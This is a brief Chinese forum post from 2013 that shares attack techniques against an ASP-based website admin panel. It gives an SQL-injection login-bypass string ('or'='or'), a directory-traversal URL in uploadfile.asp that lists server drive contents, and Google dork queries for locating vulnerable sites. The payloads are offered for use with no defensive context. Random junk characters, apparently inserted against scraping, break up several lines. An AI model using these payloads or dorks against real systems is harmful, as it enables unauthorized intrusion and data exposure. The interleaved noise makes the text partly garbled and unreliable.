后台万能密码 'or'='or'- F3 X. Z, k+ I$ y R$ Z
: h8 d! o5 c. `% x& U7 g9 I3 A$ V& s
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!, e, x' P9 c' e/ S; M
admin/uploadfile.asp?currentFolder=/upfiles/../
% N/ I4 ?; x- u" Z: A4 ]3 b7 \' o1 K7 n* K
漏洞证明:
% r7 {3 c8 [- `* W, u& I: U$ l. ?/ I
谷歌:inurl:type.asp?id=1 新闻中心& z; H8 ~. v: W# S9 R
或者 :inurl:download_ok.asp?
' o: |3 A8 ^0 G7 {( |, p
( t! |* F# A+ E& x |
发表于 2013-3-14 20:17:32
收藏
支持
反对